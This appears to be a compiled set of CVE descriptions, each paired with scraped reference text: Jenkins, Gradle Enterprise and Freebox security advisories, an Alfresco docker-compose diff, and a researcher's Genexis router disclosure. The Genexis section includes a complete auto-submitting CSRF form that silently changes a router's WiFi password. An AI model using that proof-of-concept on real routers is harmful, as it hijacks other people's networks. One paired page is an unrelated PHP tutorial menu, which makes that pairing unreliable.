Jenkins Release Plugin 2.10.2 and earlier does not escape the release version in badge tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Release/Release permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Active Choices Plugin
*   Audit Trail Plugin
*   couchdb-statistics Plugin
*   Maven Cascade Release Plugin
*   Nerrvana Plugin
*   Persona Plugin
*   Release Plugin
*   Role-based Authorization Strategy Plugin
*   Shared Objects Plugin
*   SMS Notification Plugin

**Descriptions****Improper authorization due to caching in Role-based Authorization Strategy Plugin**

**SECURITY-1767 / CVE-2020-2286**  
**Severity (CVSS):** High  
**Affected plugin: role-strategy**  
**Description:**

Role-based Authorization Strategy Plugin 2.12 and newer uses a cache to speed up permission lookups.

In Role-based Authorization Strategy Plugin 3.0 and earlier this cache is not invalidated properly when an administrator changes the permission configuration. This can result in permissions being granted long after the configuration was changed to no longer grant them.

Role-based Authorization Strategy Plugin 3.1 properly invalidates the cache on configuration changes.

**Request logging could be bypassed in Audit Trail Plugin**

**SECURITY-1815 / CVE-2020-2287**  
**Severity (CVSS):** Medium  
**Affected plugin: audit-trail**  
**Description:**

Audit Trail Plugin logs requests whose URL path matches an admin-configured regular expression.

A discrepancy between the behavior of the plugin and the Stapler web framework in parsing URL paths allows attackers to craft URLs that would bypass request logging in Audit Trail Plugin 3.6 and earlier. This only applies to Jenkins 2.227 and earlier, LTS 2.204.5 and earlier, as the fix for SECURITY-1774 prohibits dispatch of affected requests.

Audit Trail Plugin 3.7 processes request URL paths the same way as the Stapler web framework.

**Incorrect default pattern in Audit Trail Plugin**

**SECURITY-1846 / CVE-2020-2288**  
**Severity (CVSS):** Medium  
**Affected plugin: audit-trail**  
**Description:**

Audit Trail Plugin uses regular expressions to match requested URLs whose dispatch should be logged.

In Audit Trail Plugin 3.6 and earlier, the default regular expression pattern could be bypassed in many cases by adding a suffix to the URL that would be ignored during request handling.

Audit Trail Plugin 3.7 changes the default regular expression pattern so that it allows for arbitrary suffixes. It automatically will replace previous default patterns with the new, more complete default pattern.

Additionally, an administrative monitor is shown if a user-specified pattern is found to be bypassable through crafted URLs and form validation was improved to recognize patterns that would not match requests with arbitrary suffixes.

**Stored XSS vulnerability in Active Choices Plugin**

**SECURITY-1954 / CVE-2020-2289**  
**Severity (CVSS):** High  
**Affected plugin: uno-choice**  
**Description:**

Active Choices Plugin 2.4 and earlier does not escape the name and description of build parameters.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Active Choices Plugin 2.5 escapes the name of build parameters and applies the configured markup formatter to the description of build parameters.

**Stored XSS vulnerability in Active Choices Plugin**

**SECURITY-2008 / CVE-2020-2290**  
**Severity (CVSS):** High  
**Affected plugin: uno-choice**  
**Description:**

Active Choices Plugin 2.4 and earlier does not escape List and Map return values of sandboxed scripts for _Reactive Reference Parameter_.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

This issue is caused by an incomplete fix for SECURITY-470.

Active Choices Plugin 2.5 escapes all legal return values of sandboxed scripts.

**Password stored in plain text by couchdb-statistics Plugin**

**SECURITY-2065 / CVE-2020-2291**  
**Severity (CVSS):** Low  
**Affected plugin: couchdb-statistics**  
**Description:**

couchdb-statistics Plugin 0.3 and earlier stores its server password unencrypted in its global configuration file org.jenkinsci.plugins.couchstats.CouchStatsConfig.xml on the Jenkins controller as part of its configuration.

This password can be viewed by users with access to the Jenkins controller file system.

couchdb-statistics Plugin 0.4 stores its server password encrypted once its configuration is saved again.

**Stored XSS vulnerability in Release Plugin**

**SECURITY-1928 / CVE-2020-2292**  
**Severity (CVSS):** High  
**Affected plugin: release**  
**Description:**

Release Plugin 2.10.2 and earlier does not escape the release version in the badge tooltip.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Release/Release permission.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in Persona Plugin**

**SECURITY-2046 / CVE-2020-2293**  
**Severity (CVSS):** Medium  
**Affected plugin: persona**  
**Description:**

Persona Plugin 2.4 and earlier allows users with Overall/Read permission to read arbitrary files on the Jenkins controller.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Maven Cascade Release Plugin**

**SECURITY-2049 / CVE-2020-2294 (permission check), CVE-2020-2295 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: maven-release-cascade**  
**Description:**

Maven Cascade Release Plugin 1.3.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to start cascade builds and layout builds, and reconfigure the plugin.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability in Shared Objects Plugin**

**SECURITY-2052 / CVE-2020-2296**  
**Severity (CVSS):** Medium  
**Affected plugin: shared-objects**  
**Description:**

Shared Objects Plugin 0.44 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to configure shared objects.

As of publication of this advisory, there is no fix.

**Access token stored in plain text by SMS Notification Plugin**

**SECURITY-2054 / CVE-2020-2297**  
**Severity (CVSS):** Low  
**Affected plugin: sms**  
**Description:**

SMS Notification Plugin 1.2 and earlier stores an access token unencrypted in its global configuration file com.hoiio.jenkins.plugin.SMSNotification.xml on the Jenkins controller as part of its configuration.

This access token can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**XXE vulnerability in Nerrvana Plugin**

**SECURITY-2097 / CVE-2020-2298**  
**Severity (CVSS):** High  
**Affected plugin: nerrvana-plugin**  
**Description:**

Nerrvana Plugin 1.02.06 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Overall/Read permission to have Jenkins parse a crafted HTTP request with XML data that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Additionally, XML parsing is exposed as a form validation endpoint that does not require POST requests, allowing exploitation by users without Overall/Read permission via CSRF.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1767: High
*   SECURITY-1815: Medium
*   SECURITY-1846: Medium
*   SECURITY-1928: High
*   SECURITY-1954: High
*   SECURITY-2008: High
*   SECURITY-2046: Medium
*   SECURITY-2049: Medium
*   SECURITY-2052: Medium
*   SECURITY-2054: Low
*   SECURITY-2065: Low
*   SECURITY-2097: High

**Affected Versions**

*   **Active Choices Plugin** up to and including 2.4
*   **Audit Trail Plugin** up to and including 3.6
*   **couchdb-statistics Plugin** up to and including 0.3
*   **Maven Cascade Release Plugin** up to and including 1.3.2
*   **Nerrvana Plugin** up to and including 1.02.06
*   **Persona Plugin** up to and including 2.4
*   **Release Plugin** up to and including 2.10.2
*   **Role-based Authorization Strategy Plugin** up to and including 3.0
*   **Shared Objects Plugin** up to and including 0.44
*   **SMS Notification Plugin** up to and including 1.2

**Fix**

*   **Active Choices Plugin** should be updated to version 2.5
*   **Audit Trail Plugin** should be updated to version 3.7
*   **couchdb-statistics Plugin** should be updated to version 0.4
*   **Role-based Authorization Strategy Plugin** should be updated to version 3.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Maven Cascade Release Plugin
*   Nerrvana Plugin
*   Persona Plugin
*   Release Plugin
*   Shared Objects Plugin
*   SMS Notification Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1846, SECURITY-2046, SECURITY-2097
*   **Daniel Beck, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-1815
*   **Jeff Thompson, CloudBees, Inc.** for SECURITY-2052
*   **Long Nguyen, Viettel Cyber Security** for SECURITY-2054, SECURITY-2065
*   **Raihaan Shouhell, Autodesk, Inc** for SECURITY-1767
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1928, SECURITY-1954, SECURITY-2008
*   **Wadeck Follonier, CloudBees, Inc. and Jeff Thompson, CloudBees, Inc.** for SECURITY-2049

CVE-2020-2292: Jenkins Security Advisory 2020-10-08

PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, or City.

**PHP Data Objects (PDO)**

*   PDO – PHP database extension
*   How to use PDO to insert data into the database?
*   How to use PDO to read data from the database?
*   How to use PDO to update the database?
*   How to delete records?
*   PHP CRUD Operation using PDO Extension
*   Signup and Login operation using PDO
*   Password Hashing in PHP using PDO

**PHP OOP Concepts**

*   Basics Of OOPs in PHP
*   How to create classes and objects?
*   The $this keyword
*   Chaining methods and properties
*   Access modifiers: public vs. private
*   Magic Methods
*   The \_\_construct() magic method
*   Inheritance in PHP
*   Multilevel and Multiple inheritances in PHP

**CodeIgniter**

*   CI Introduction
*   CI Directory Structure
*   CI Controllers
*   CI Model
*   CI View
*   CI Libraries
*   CI Helpers
*   CI Plugins
*   How to create form in CI

**HTML**

*   HTML Introduction
*   HTML Useful Tags
*   HTML Text Formats
*   HTML Links
*   HTML Images
*   HTML Lists
*   HTML Forms
*   HTML Table
*   Content Style in HTML

**MySQL**

*   MySQL Introduction
*   MySQL Command-line
*   MySQL GUI Tools
*   MySQL Users
*   MySQL PHP Connections
*   MySQLi Procedural Functions
*   MySQL Data Type
*   MySQL Database and Tables
*   MySQL Column Modifiers

**Interview QAs**

*   PHP Interview Questions and Answers for Fresher
*   Basic PHP Programs
*   PHP Programming/ Logical Interview questions and answers
*   WordPress Interview Questions and Answers
*   MySQL Interview Question and Answers
*   Common SQL Interview Questions and Answers
*   CodeIgniter Interview Questions and Answers

**WordPress**

*   What is wordpress?
*   WordPress.com vs. WordPress.org
*   WordPress Installation
*   Logging Into Your New WordPress Site
*   WordPress Directory and File Structure
*   WordPress DB Structure & Schema

**PHP with Mysqli**

*   How to Connect PHP with MySQL Database
*   How to insert data into MySql using PHP
*   How to fetch data from MySQL using PHP
*   CRUD operation using PHP and MySQLi
*   User Signup and Sign in using HTML and PHP
*   How to change Password in PHP
*   User login and login tracking using PHP
*   How to check Email and username availability live using jquery/ajax
*   jQuery Dependent DropDown List – States and Districts
*   How to Send Mail Using PHP
*   PHP Email Verification Script
*   How to fetch data in excel or generate excel file in PHP
*   How to prevent Cross-Site Request Forgery (CSRF) in PHP
*   User registration with server-side validation using PHP
*   How to create a Shopping Cart in PHP
*   How to delete multiple records in PHP
*   PHP login with remember me function
*   How to create pagination in PHP
*   How to Create pagination using PHP and MySQLi(with the page number)
*   How to Dynamically Add / Remove input fields in PHP with Jquery Ajax
*   How to send email from localhost using PHP
*   How to use multiple insert queries in PHP
*   CRUD operation with Image Using PHP and MySQLi

**Other PHP Tutorials**

*   Time Ago Script in PHP
*   Get City Country By IP Address in PHP
*   Hit counter in PHP
*   Captcha Image Verification in PHP
*   Server Side form Validation in PHP
*   Date And Time Formatting With PHP
*   How to get Current Indian time in PHP
*   How to get Browser Information In PHP
*   How to convert number to String in PHP
*   How to get current page URL in PHP
*   How to get yesterday and tomorrow date in PHP
*   How to change date format in PHP

As technology keeps updating itself… so do we need to. Advancement in technology is the key to innovation through which you enjoy things you couldn’t a decade ago. Similarly, any Programming language basics keep on updating; it is essential for you to also get trained on all the latest features and the basics while learning a programming language.

PHPGurukul provides you with **PHP Latest tutorials** such as PHP CRUD operations using Procedure or MySQL group, and we keep on adding the latest functionalities tutorials to our website. Apart from these tutorials, we offer some great and usual benefits which will help you in your PHP career, and those are below:

*   You can easily get **PHP Projects Idea** through our website, which you would require when you learn PHP and want to try out something on your own. It all starts with an idea, of course.
*   Our website provides **PHP Tutorials for Students,** and you can also purchase Project reports from PHP gurukul for your submissions in college/universities.
*   Any programming language is tough to learn, but it becomes easier and fun to learn when you start with the basics. Our **PHP Tutorials for beginners** help you to learn from the basics till you learn the advanced concepts of PHP.
*   When you are doing web development apart from scripting languages like HTML, JavaScript, you should also know **PHP oops Concepts,** which are well explained in our tutorials to help you excel in PHP.

PHPGurukul also offers **PHP Projects** available for download in a few and easy steps that you can use directly or can customize as per your needs as PHP is an open-source scripting language. You can opt for free PHP Projects or go for our special Paid PHP Projects with additional features that are good for learning and professional usage.

You can enjoy the tutorials with special advanced concepts, go through Interview Q&A, or download the required PHP Projects with Project reports within no time using our website.

CVE-2020-25270: PHP Project, PHP Projects Ideas, PHP Latest tutorials, PHP oops Concept

CodeLathe FileCloud before 20.2.0.11915 allows username enumeration.

CVE-2020-26524: FileCloud Release Notes

Pagure before 5.6 allows XSS via the templates/blame.html blame view.

CVE-2019-11556: Changelog — pagure documentation

The Alfresco Reset Password add-on before version 1.2.0 relies on untrusted inputs in a security decision. Intruders can get admin's access to the system using the vulnerability in the project. Impacts all servers where this add-on is installed. The problem is fixed in version 1.2.0

@@ -0,0 +1,142 @@  
version: "2"  
services: alfresco-resetpassword: # image: alfresco/alfresco-content-repository-community:6.2.0-ga build: ./../alfresco-resetpassword environment: CATALINA\_OPTS: "\-agentlib:jdwp=transport=dt\_socket,server=y,suspend=n,address=0.0.0.0:8888" JAVA\_OPTS : " \-Ddb.driver=org.postgresql.Driver \-Ddb.username=alfresco \-Ddb.password=alfresco \-Ddb.url=jdbc:postgresql://postgres-resetpassword:5432/alfresco \-Dsolr.host=solr6-resetpassword \-Dsolr.port=8983 \-Dsolr.secureComms=none \-Dsolr.base.url=/solr \-Dindex.subsystem.name=solr6 \-Ddeployment.method=DOCKER\_COMPOSE \-Dcsrf.filter.enabled=false \-Dmessaging.subsystem.autoStart=false \-Dlocal.transform.service.enabled=true \-DlocalTransform.pdfrenderer.url=http://alfresco-pdf-renderer:8090/ \-DlocalTransform.imagemagick.url=http://imagemagick:8090/ \-DlocalTransform.libreoffice.url=http://libreoffice:8090/ \-DlocalTransform.tika.url=http://tika:8090/ \-DlocalTransform.misc.url=http://transform-misc:8090/ \-Dlegacy.transform.service.enabled=true \-Dalfresco-pdf-renderer.url=http://alfresco-pdf-renderer:8090/ \-Djodconverter.url=http://libreoffice:8090/ \-Dimg.url=http://imagemagick:8090/ \-Dtika.url=http://tika:8090/ \-Dtransform.misc.url=http://transform-misc:8090/ \-Xms1500m -Xmx1500m " ports: \- 8082:8080 #Browser port \- 5005:8888 \- 2121:2121 links: \- postgres-resetpassword volumes: \- alf\_data-resetpassword:/usr/local/tomcat/alf\_data \- ./../alfresco-resetpassword/\_lib:/usr/local/tomcat/webapps/alfresco/development/lib \- ./../alfresco-resetpassword/target/classes:/usr/local/tomcat/webapps/alfresco/development/classes \- ./../alfresco-resetpassword/context.xml:/usr/local/tomcat/webapps/alfresco/META-INF/context.xml  
alfresco-pdf-renderer: image: alfresco/alfresco-pdf-renderer:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
imagemagick: image: alfresco/alfresco-imagemagick:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
libreoffice: image: alfresco/alfresco-libreoffice:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
tika: image: alfresco/alfresco-tika:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
transform-misc: image: alfresco/alfresco-transform-misc:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
  
share-resetpassword: # image: alfresco/alfresco-share:6.2.0 build: ./../share-resetpassword environment: \- REPO\_HOST=alfresco-resetpassword \- REPO\_PORT=8080 \- JAVA\_OPTS=-agentlib:jdwp=transport=dt\_socket,server=y,suspend=n,address=5006 ports: \- 8080:8080 \- 5006:5006 volumes: \- ./../share-resetpassword/\_lib:/usr/local/tomcat/webapps/share/development/lib \- ./../share-resetpassword/target/classes:/usr/local/tomcat/webapps/share/development/classes \- ./../share-resetpassword/context.xml:/usr/local/tomcat/webapps/share/META-INF/context.xml \- ./../share-resetpassword/src/main/resources/web:/usr/local/tomcat/webapps/share/development/web  
postgres-resetpassword: image: postgres:11.4 environment: \- POSTGRES\_PASSWORD=alfresco \- POSTGRES\_USER=alfresco \- POSTGRES\_DB=alfresco command: postgres -c max\_connections=300 -c log\_min\_messages=LOG ports: \- 5435:5432  
solr6-resetpassword: image: alfresco/alfresco-search-services:1.4.0 environment: #Solr needs to know how to register itself with Alfresco \- SOLR\_ALFRESCO\_HOST=alfresco-resetpassword \- SOLR\_ALFRESCO\_PORT=8080 #Alfresco needs to know how to call solr \- SOLR\_SOLR\_HOST=solr6-resetpassword \- SOLR\_SOLR\_PORT=8983 #Create the default alfresco and archive cores \- SOLR\_CREATE\_ALFRESCO\_DEFAULTS=alfresco,archive \- ALFRESCO\_SECURE\_COMMS=none ports: \- 8983  
activemq-resetpassword: image: alfresco/alfresco-activemq:5.15.8 ports: \- 8161 # Web Console \- 5672 # AMQP \- 61616 # OpenWire \- 61613 # STOMP volumes: alf\_data-resetpassword:

CVE-2020-15181: Merge remote-tracking branch 'remotes/origin/candidate' into release · FlexSolution/AlfrescoResetPassword@5927b96

An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site request forgery.

All advisories**CSRF prevention token is overridable by user code**

**Affected product(s)**

*   Gradle Enterprise 2018.2 - 2020.2.4

**Severity**

High

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15776

**Description**

The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site request forgery.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15776: Gradle Enterprise - Security Advisories

An issue was discovered in Gradle Enterprise 2018.2 and Gradle Enterprise Build Cache Node 4.1. Cross-site transmission of cookie containing CSRF token allows remote attacker to bypass CSRF mitigation.

All advisories**Request cookies containing CSRF prevention token are not same-site restricted**

**Affected product(s)**

*   Gradle Enterprise 2018.2

**Severity**

Moderate

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15771

**Description**

Cross-site transmission of cookie containing CSRF token allows remote attacker to bypass CSRF mitigation.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15771: Gradle Enterprise - Security Advisories

An issue was discovered in Gradle Enterprise before 2020.2.5. The cookie used to convey the CSRF prevention token is not annotated with the “secure” attribute, which allows an attacker with the ability to MITM plain HTTP requests to obtain it, if the user mistakenly uses a HTTP instead of HTTPS address to access the server. This cookie value could then be used to perform CSRF.

All advisories**CSRF prevention cookie is susceptible to capture by MITM on HTTP redirect**

**Affected product(s)**

*   Gradle Enterprise < 2020.2.5

**Severity**

Moderate

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15767

**Description**

The cookie used to convey the CSRF prevention token is not annotated with the “secure” attribute, which allows an attacker with the ability to MITM plain HTTP requests to obtain it, if the user mistakenly uses a HTTP instead of HTTPS address to access the server.

This cookie value could then be used to perform CSRF.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15767: Gradle Enterprise - Security Advisories

A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3.

**Mise à jour du Freebox Server (Révolution/mini/One/Delta/Pop) 4.2.3**

**Posté par:** | **Le** 5 août 2020 à 11:15 | **Catégorie:** Freebox Server, Mise à jour | Comments Off on Mise à jour du Freebox Server (Révolution/mini/One/Delta/Pop) 4.2.3

La mise à jour est disponible depuis le 05 aout 2020 à 11h00. Pour en profiter, veuillez redémarrer le Freebox Server.

La mise à jour apporte les changements suivants :

**Corrections**

*   Les graphes de débit affichent maintenant les débits supérieurs à 1Gbit/s (Freebox Pop)
*   Amélioration de la QOS en mode VDSL lorsque le débit upload est faible (Freebox Pop)
*   Correction du mode bridge (Freebox Pop)
*   Correction des déconnexions aléatoires non visibles sur l’historique des connexions (Freebox Révolution/Mini4k)
*   Pour les cartes Wifi utilisées en mode 160Mhz, en cas de détection de radar (DFS), la carte diminuera maintenant automatiquement la largeur de bande.
*   Correction d’un problème de stabilité sur le wifi N des Freebox Révolution/mini4k/One

\[Mise à jour 07/09/2020\]

Ce firmware corrige également les problèmes de sécurité suivants:

*   CVE-2020-24373, CSRF in UPnP MediaServer
*   CVE-2020-24375, DNS-rebinding in UPnP MediaServer
*   CVE-2020-24376, DNS-rebinding in UPnP IGD
*   CVE-2020-24377, DNS-rebinding in Freebox OS web interface
*   CVE-2020-24374, DNS-rebinding in Freebox HD web interface (firmware 1.5.29)

Merci à Gabriel Corona d’avoir identifié ces problèmes et suivi la procédure de divulgation responsable.

CVE-2020-24373: L'actualité de la Freebox » Blog Archive

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.

**CVE ID:** CVE-2020-25015

****Summary****

Platinum 4410 is a compact router from Genexis that is commonly used at homes. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

> Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.
> 
> _—_ OWASP

For more information on CSRF, please visit this article.

**Impact**

An attacker can send the victim a link, which if he clicks while he is connected to the WIFI network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

**Vulnerability**

Ideally, this attack would be troublesome because for a CSRF attack to be successful, it requires the victim to be logged in to the application that is under the attack (in this case, the web-based setup page at 192.168.1.1) and most router setup pages ends user sessions automatically. Additionally, it is rarely that customers visit their router’s setup page as well. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change password could be sent by unauthenticated parties as well.

Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
          <input type="hidden" name="wlEnbl" value="ON" />
          <input type="hidden" name="hwlKeys0" value="" />
          <input type="hidden" name="hwlKeys1" value="" />
          <input type="hidden" name="hwlKeys2" value="" />
          <input type="hidden" name="hwlKeys3" value="" />
          <input type="hidden" name="hwlgMode" value="9" />
          <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
          <input type="hidden" name="hwlEnbl" value="1" />
          <input type="hidden" name="hWPSMode" value="1" />
          <input type="hidden" name="henableSsid" value="1" />
          <input type="hidden" name="hwlHide" value="0" />
          <input type="hidden" name="isInWPSing" value="0" />
          <input type="hidden" name="WpsConfModeAll" value="7" />
          <input type="hidden" name="WpsConfModeNone" value="0" />
          <input type="hidden" name="hWpsStart" value="0" />
          <input type="hidden" name="isCUCSupport" value="0" />
          <input type="hidden" name="SSIDPre" value="N&#47;A" />
          <input type="hidden" name="bwControlhidden" value="0" />
          <input type="hidden" name="ht&#95;bw" value="1" />
          <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
          <input type="hidden" name="wlChannel" value="0" />
          <input type="hidden" name="wlTxPwr" value="1" />
          <input type="hidden" name="wlSsidIdx" value="0" />
          <input type="hidden" name="SSID&#95;Flag" value="0" />
          <input type="hidden" name="wlSsid" value="JINSON" />
          <input type="hidden" name="wlMcs" value="33" />
          <input type="hidden" name="bwControl" value="1" />
          <input type="hidden" name="giControl" value="1" />
          <input type="hidden" name="enableSsid" value="on" />
          <input type="hidden" name="wlAssociateNum" value="32" />
          <input type="hidden" name="wlSecurMode" value="WPAand11i" />
          <input type="hidden" name="wlPreauth" value="off" />
          <input type="hidden" name="wlNetReauth" value="1" />
          <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
          <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
          <input type="hidden" name="wlWpaGtkRekey" value="" />
          <input type="hidden" name="wlRadiusIPAddr" value="" />
          <input type="hidden" name="wlRadiusPort" value="" />
          <input type="hidden" name="wlRadiusKey" value="" />
          <input type="hidden" name="wlWpa" value="TKIPAES" />
          <input type="hidden" name="wlKeyBit" value="64" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="WpsActive" value="0" />
          <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
          <input type="hidden" name="pinvalue" value="" />
          <input type="hidden" name="Save&#95;Flag" value="1" />
          <input type="submit" value="Submit request" />
        </form>
         <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

As long as the victim is connected to the WiFi access point established by the affected router, the password of the access point would get changed as shown in the below video.

****Timeline****

*   Vulnerability reported to the Genexis team on August 28, 2020
*   Team confirmed firmware release containing fix on September 14, 2020

****Recommendation****

*   As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
*   Use a more secure router if you are unable to upgrade the firmware.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
*   https://nvd.nist.gov/vuln/detail/CVE-2020-25015

Tags: broken access control, CSRF, genexis, genexis platinum 4410, genexis routers, owasp, owasp top 10, router, vulnerability

**Jinson Varghese**

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.

Tag

#csrf